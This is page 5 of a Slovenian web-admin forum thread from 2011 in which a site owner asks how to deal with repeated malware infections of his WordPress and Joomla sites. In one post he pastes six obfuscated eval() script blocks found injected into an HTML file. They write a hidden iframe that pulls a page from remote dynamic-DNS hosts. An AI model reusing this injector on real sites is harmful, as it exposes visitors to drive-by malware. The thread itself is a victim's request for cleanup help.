Virus na strežniku [stran 5] - InternetMojster.com

Domov > Administracija strežnikov in spletnih strani > Virus na strežniku

stran 5 od 5 |<<1 2 3 45>>|

Virus na strežniku

bobo0527. okt 2011 11:13:51Pridružen od: 8. dec 2009 1804 objave +1057-14317	#41 OvcaX: Najbolje bi bilo vprašat na hosting kako pride do tega. 1. Imaš okužen FTP client 2. Spiz*** so ti geslo in nalagajo sami 3. Imaš exploitable joomlo ali kaj podobnega Tole so najbolj pogosti primeri pri nas. Kot prvo obvezno zamenjaj geslo in ga ne hrani več v FTP clientu. Updataj vse skripte na zadnje verzije. Z antivirusom preveri svoj računalnik Po logih mi kaže, da sta se gor konektala v zadnjem mescu le 2 IP-ja. Moj in kolegov. Geslo menjal iz neokuženega računalnika. Vse sem posodobil, poslal na SGH in so rekli: No, it is not a root kit, the server itself is not infected. It is only the files hosted under your account. It is most likely that the problem was caused due to a vulnerability found in one of Wordpress scripts or plugins. The best advice would be backing up Wordpress databases and images, re-installing Wordpress blogs from scratch and then restoring databases/images. Even if you remove all malware found by our anti virus, there may be still a back door injected to one of your scripts which can't be detected. And in this case the problem will happen again. Zdaj sem server čisto spucal, vse testne WordPresse, ko sem testiral gor teme, sem zbriso, prav tako pa sumim na eno skripto oz spletno igro, ki jo je imel en kolega gor. Če se pa to spet pojavi, pa kaj je najboljše da naredim? Grem v WP in izvozim vsebino, pa potem spet na sveže inštaliram zadevo? všeč(+1)ni všeč(0)spam(0) Facebook in AdWords kuponi za 1€! Dve besedici odpirata veliko vrat "VLECI" in "RINI"!


admin-bic829. okt 2011 20:13:44Pridružen od: 29. okt 2011 1 objava 000	#42kakšen wordprees imaš zadnje čase znajo koristiti da zakodiraš posamezne spletne strani gesla pa shraniš na pomožni trdi disk, ki mora biti predvsem večji da narediš beckup strani ali kopije svojega windowsa všeč(0)ni všeč(0)spam(0)


bobo0512. nov 2011 16:46:37Pridružen od: 8. dec 2009 1804 objave +1057-14317	#43Spet nekaj narobe z serverjem, zj*balo mi je vse Joomla strani, ni pa še Google nič javil, da bi ble strani okužene. Sem pisal na SGH, tole so mi poslali. Ma kdo kako idejo, kaj bi mogel naredit? všeč(0)ni všeč(0)spam(0) Facebook in AdWords kuponi za 1€! Dve besedici odpirata veliko vrat "VLECI" in "RINI"!


Weby12. nov 2011 18:04:36Pridružen od: 1. maj 2008 700 objav +88-182	#44Če ne uporabljaš exec-a ga v php.ini onemogoči :) všeč(0)ni všeč(0)spam(0) No Packages marked for Update


bobo0514. nov 2011 11:48:28Pridružen od: 8. dec 2009 1804 objave +1057-14317	#45Mah, spet se pojavo virus,... Tole sem zasledil v HTML fajlu: \0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8=u.v(i)}d(!3.t(/^[a-r-9]$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'\|\|\|data\|\|var\|cookie\|result\|b16_map\|\|\|b16_digits\|document\|if\|enabled\|new\|charAt\|length\|\|\|Array\|for\|ll\|hDcd\|return\|substr\|false\|f0\|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393970783b20746f703a202d3239393770783b223e3c696672616d652077696474683d223322206865696768743d223422207372633d22687474703a2f2f69636e73636b64712e7a796e732e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e\|match\|String\|fromCharCode\|enabledcookie\|0123456789abcdef\|function\|256\|join\|15\|indexOf\|write'.split('\|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8=u.v(i)}d(!3.t(/^[a-r-9]$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'\|\|\|data\|\|var\|cookie\|result\|b16_map\|\|\|b16_digits\|document\|if\|enabled\|new\|charAt\|length\|\|\|Array\|for\|ll\|hDcd\|return\|substr\|false\|f0\|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393270783b20746f703a202d3239393470783b223e3c696672616d652077696474683d223422206865696768743d223222207372633d22687474703a2f2f7a616e727463772e64646e732e696e666f2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e\|match\|String\|fromCharCode\|enabledcookie\|0123456789abcdef\|function\|256\|join\|15\|indexOf\|write'.split('\|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8=u.v(i)}d(!3.t(/^[a-r-9]$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'\|\|\|data\|\|var\|cookie\|result\|b16_map\|\|\|b16_digits\|document\|if\|enabled\|new\|charAt\|length\|\|\|Array\|for\|ll\|hDcd\|return\|substr\|false\|f0\|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393870783b20746f703a202d3239393770783b223e3c696672616d652077696474683d223422206865696768743d223322207372633d22687474703a2f2f69636e73636b64712e7a796e732e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e\|match\|String\|fromCharCode\|enabledcookie\|0123456789abcdef\|function\|256\|join\|15\|indexOf\|write'.split('\|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8=u.v(i)}d(!3.t(/^[a-r-9]$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'\|\|\|data\|\|var\|cookie\|result\|b16_map\|\|\|b16_digits\|document\|if\|enabled\|new\|charAt\|length\|\|\|Array\|for\|ll\|hDcd\|return\|substr\|false\|f0\|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393970783b20746f703a202d3239393270783b223e3c696672616d652077696474683d223422206865696768743d223422207372633d22687474703a2f2f7a616e727463772e64646e732e696e666f2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e\|match\|String\|fromCharCode\|enabledcookie\|0123456789abcdef\|function\|256\|join\|15\|indexOf\|write'.split('\|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8=u.v(i)}d(!3.t(/^[a-r-9]$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'\|\|\|data\|\|var\|cookie\|result\|b16_map\|\|\|b16_digits\|document\|if\|enabled\|new\|charAt\|length\|\|\|Array\|for\|ll\|hDcd\|return\|substr\|false\|f0\|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393470783b20746f703a202d3239393970783b223e3c696672616d652077696474683d223322206865696768743d223322207372633d22687474703a2f2f69636e73636b64712e7a796e732e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e\|match\|String\|fromCharCode\|enabledcookie\|0123456789abcdef\|function\|256\|join\|15\|indexOf\|write'.split('\|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8=u.v(i)}d(!3.t(/^[a-r-9]$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'\|\|\|data\|\|var\|cookie\|result\|b16_map\|\|\|b16_digits\|document\|if\|enabled\|new\|charAt\|length\|\|\|Array\|for\|ll\|hDcd\|return\|substr\|false\|f0\|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393670783b20746f703a202d3239393970783b223e3c696672616d652077696474683d223222206865696768743d223422207372633d22687474703a2f2f7a616e727463772e64646e732e696e666f2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e\|match\|String\|fromCharCode\|enabledcookie\|0123456789abcdef\|function\|256\|join\|15\|indexOf\|write'.split('\|'),0,{}))</script> Očitno bom mogo vse skupaj prenest drugam,... všeč(0)ni všeč(0)spam(0) Facebook in AdWords kuponi za 1€! Dve besedici odpirata veliko vrat "VLECI" in "RINI"!


bobo0515. nov 2011 22:29:02Pridružen od: 8. dec 2009 1804 objave +1057-14317	#46Nisem glih expert ampak mislim da sem našel izvor (vsaj za Joomla strani). V temi beez, sem v default.php našel tole vrstico: $return = base64_encode(base64_decode($return).'#content'); A bi lahko blo to to, kar mi ponovno zapiše tale virus? všeč(0)ni všeč(0)spam(0) Facebook in AdWords kuponi za 1€! Dve besedici odpirata veliko vrat "VLECI" in "RINI"!


Matjaž15. nov 2011 22:44:05Pridružen od: 21. sep 2007 1656 objav +873-1178	#47Če se ne motim je to samo ukaz, ki vrne neko base64 kodirano vsebino v članke. Tole je defolt v tej datoteki in nima veze s tvojimi problemi. nazadnje urejal Matjaž 15. nov 2011 22:49:40 všeč(0)ni všeč(0)spam(0) MojWeb I SiJoomla I Spletne vizitke


bobo0515. nov 2011 22:54:09Pridružen od: 8. dec 2009 1804 objave +1057-14317	#48Ampak zanimivo je tole, da ko sem to zbrisal, so se vse strani začele prikazovati normalno. všeč(0)ni všeč(0)spam(0) Facebook in AdWords kuponi za 1€! Dve besedici odpirata veliko vrat "VLECI" in "RINI"!


Matjaž15. nov 2011 23:05:53Pridružen od: 21. sep 2007 1656 objav +873-1178	#49To bi najbrž tudi, če bi izbrisal samo #content ? všeč(0)ni všeč(0)spam(0) MojWeb I SiJoomla I Spletne vizitke


Domov > Administracija strežnikov in spletnih strani > Virus na strežniku stran 5 od 5 \|<<1 2 3 45>>\|